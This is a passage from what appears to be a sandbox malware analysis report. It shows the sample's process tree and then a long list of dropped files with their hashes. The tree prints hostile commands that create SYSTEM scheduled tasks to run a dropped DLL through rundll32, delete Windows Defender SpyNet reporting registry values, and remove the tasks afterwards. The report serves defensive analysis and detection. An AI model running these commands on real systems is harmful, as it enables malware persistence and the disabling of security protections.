                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /CREATE /TN "KXedXbbPXfRSTqSGhkK2" /F /xml "C:\Program Files (x86)\LHSdqcBuKngoC\YHnvQEl.xml" /RU "SYSTEM"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:5468
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /CREATE /TN "UBMMPCNwOPxrkxvwY" /SC once /ST 00:43:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gCqgzsIdJleQZgeU\MibDnviv\aBGtnkd.dll\",#1 /bLsite_idGZN 385118" /V1 /F
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:4580
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /run /I /tn "UBMMPCNwOPxrkxvwY"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5536
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5220
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5656
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3324
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:5828
                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                              schtasks /DELETE /F /TN "OyNPSoRSgtYwHEpij"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4076
                                                                                                                                                                                            • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gCqgzsIdJleQZgeU\MibDnviv\aBGtnkd.dll",#1 /bLsite_idGZN 385118
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:5588
                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gCqgzsIdJleQZgeU\MibDnviv\aBGtnkd.dll",#1 /bLsite_idGZN 385118
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                  PID:5576
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /DELETE /F /TN "UBMMPCNwOPxrkxvwY"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:216

                                                                                                                                                                                                Network

                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                Downloads

                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  1.3MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  d64886bb9d463e37bf201adcad986dad

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  91a4af3acc83cf734891b8d945d6c30846ed78e5

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  636599aff4100bc8cca3da8ba8970914174e3f660ee1048f1c1e0444da4e8b43

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  a836b4767a46cfb74311a6dd75cb8b35181dbb39805e209572ccf6a1a92a02074d74fdab9be730eff591122e61d06b611a30e403125765ab9e8869f8e63acca9

                                                                                                                                                                                                • C:\ProgramData\Are.docx

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  11KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  593KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  593KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                • C:\ProgramData\nss3.dll

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  2.0MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  187B

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  136B

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  150B

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  10KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  b217fef39e22fb8256a84fc9cef92b83

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  aa0ded040b0f388ae0c76dbfae2ec79870465161

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  206efaa5e83aa160cb44fbc1e86170d04a71c8520e5f189dd401f4c32eb88905

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  311d99bd4c4d0ff61169807414daa094e0f410e74ff68ea75a73d8a7d03d2e26e5ca934b425b5001fdbe48431f2c3624f779698ba9f413ed6aded3a9dd039a2e

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  36KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  a910562bd89ddc49439667564b9da036

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  621e92155d56d45961b5fab2deab6a4d6c2496f0

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  eb299c1fc3daf33f355f7611911279eedabe344db7d2b6f46461ece59b15047c

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  6071ce5965e894a58ce36744c1befcc2dc54eb125aa1d6f0dc0b91a86097b5593a5eb1086671309312c775ff349a73811cc5af0f3a9c60a087a1bb427110adf2

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  2KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  2KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  968cb9309758126772781b83adb8a28f

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  8da30e71accf186b2ba11da1797cf67f8f78b47c

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  151B

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  9KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  4be803b42d20bea7b3fa340775e2e0d5

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  688217726dd24c3a9c35be709534b89ed7179ea4

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  d43091acfb08987771b7636228dbac21bd3a33a00ca6a38718745e3b57dfbabc

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  35c1b21e2c924ce1a14ac1219d7f1b9ac3743e51d68616cf08a5e50b8a2242348a0bd9202459fb93de779ef7824f83ffdde2db00e02284fa731090ab21d2e49d

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  18KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  cbc59f97f3cc6e6850e06f465c374f98

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  097e7d5d552d0ab1298df1abbad67eb9e24efa18

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  a02d2797de01de4e949e7735fa5b22448c8d34e02d98a6c09e6adfc7ce131706

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  6d1294da64f521658eacd5ad677009fdd500b438829b210ae7efc49e576514e688ee16c4fcf936cfb44dd87df6012f67c61e7c3cb0504039e32ff1c7e62f758a

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\additional_file0.tmp

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  1.9MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  b0f128c3579e6921cfff620179fb9864

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  60e19c987a96182206994ffd509d2849fdb427e3

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  1.9MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  b0f128c3579e6921cfff620179fb9864

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  60e19c987a96182206994ffd509d2849fdb427e3

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  1.9MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  b0f128c3579e6921cfff620179fb9864

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  60e19c987a96182206994ffd509d2849fdb427e3

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\assistant_installer.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  34afbc4605531efdbe6f6ce57f567c0a

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\assistant_installer.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  34afbc4605531efdbe6f6ce57f567c0a

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\dbgcore.DLL

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  166KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  5a6cd2117967ec78e7195b6ee10fc4da

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  72d929eeb50dd58861a1d4cf13902c0b89fadc34

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\dbgcore.dll

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  166KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  5a6cd2117967ec78e7195b6ee10fc4da

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  72d929eeb50dd58861a1d4cf13902c0b89fadc34

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\dbgcore.dll

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  166KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  5a6cd2117967ec78e7195b6ee10fc4da

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  72d929eeb50dd58861a1d4cf13902c0b89fadc34

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\dbghelp.dll

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  1.7MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  861a07bcf2a5cb0dda1aaf6dfcb57b26

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  a0bdbbc398583a7cfdd88624c9ac2da1764e0826

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\dbghelp.dll

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  1.7MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  861a07bcf2a5cb0dda1aaf6dfcb57b26

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  a0bdbbc398583a7cfdd88624c9ac2da1764e0826

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\dbghelp.dll

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  1.7MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  861a07bcf2a5cb0dda1aaf6dfcb57b26

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  a0bdbbc398583a7cfdd88624c9ac2da1764e0826

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\opera_package

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  103.1MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  1288fb19fba9f71635060944db19b5b8

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  9302472879eb242878f9e150fa9b3c7660134a3c

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  f57b0eb8bb74a621933af4c3204ac8d1af39e774acd846e8ac31c79dba206b75

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  21233b4a82c094fa65e90c03e322f6d9ed80a0e90d0cdfea0cd7f58ccf8c6a95ecae9440d080a5fed7081fbb54d07ef47e4465f8304df4bee64fb98b79780e9b

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\qTXnyDM1oGf47tHPkFna2dgZ.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  2.8MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  8b45364696755c751699ca274695f032

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  c5acfeab6de0ced7654081d7c2d51f69163efa48

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  0d7647d4600038c6e75320e21fb107b8eb1f956cb76cf1ae454b1cffb0c778ed

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  af916fd6f0af0ed734b2ff1284a5e8e4211e61f3886c6ba29cda95b2536c709a20b06acf0036dba57b92846b228b14a7ae7c51ebce46fd8cf9b62f3e46ba66d5

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSDDFC.tmp\Install.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  6.1MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  d22ba06472faddaa48b6bb80bcf761f9

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  069aca042d98ac64eed4f361dd7a572c52f76521

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  a05eaf2ac5c7f17cda19919344ecc33449d913b2347a0a9afb9ff2eff15414c2

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  4694c5a9407e6e8180dae5957e6d1d723807c04c2bbe3a6928e8d9f267b4488f6bc5b30087d631bca61739162e4c3b91198370a5f96b4df9c61283f9eab30bc1

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSDDFC.tmp\Install.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  6.1MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  d22ba06472faddaa48b6bb80bcf761f9

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  069aca042d98ac64eed4f361dd7a572c52f76521

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  a05eaf2ac5c7f17cda19919344ecc33449d913b2347a0a9afb9ff2eff15414c2

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  4694c5a9407e6e8180dae5957e6d1d723807c04c2bbe3a6928e8d9f267b4488f6bc5b30087d631bca61739162e4c3b91198370a5f96b4df9c61283f9eab30bc1

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSE07D.tmp\Install.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  6.9MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  8e3ebba1a7f99f94053774c0d38b567f

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  9c7ea4eaf485ece7c099ffca6f27c5fe25073ec3

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  48a796c5721b7cf7b4d974aa19bac45f0ddf828dc328010cb7ec67df8018475f

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  a5d8f8ac745d591e90b9d6c619fbba14022ec71146899d6ed8a00159411175aa7b75c8337a3bcf898893d71a300c5381b620f4da3e9d61238d53f33fb2c9e776

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSE07D.tmp\Install.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  6.9MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  8e3ebba1a7f99f94053774c0d38b567f

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  9c7ea4eaf485ece7c099ffca6f27c5fe25073ec3

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  48a796c5721b7cf7b4d974aa19bac45f0ddf828dc328010cb7ec67df8018475f

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  a5d8f8ac745d591e90b9d6c619fbba14022ec71146899d6ed8a00159411175aa7b75c8337a3bcf898893d71a300c5381b620f4da3e9d61238d53f33fb2c9e776

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Broom.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  5.3MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  00e93456aa5bcf9f60f84b0c0760a212

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  6096890893116e75bd46fea0b8c3921ceb33f57d

                                                                                                                                                                                                  SHA256

